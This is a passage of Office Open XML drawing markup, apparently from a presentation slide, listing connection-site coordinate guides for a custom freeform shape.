              <a:gd name="connsiteY95" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
